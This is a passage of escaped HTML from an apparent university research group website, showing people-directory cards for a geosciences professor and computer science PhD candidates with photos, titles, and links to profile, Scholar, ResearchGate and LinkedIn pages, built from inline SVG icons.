0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 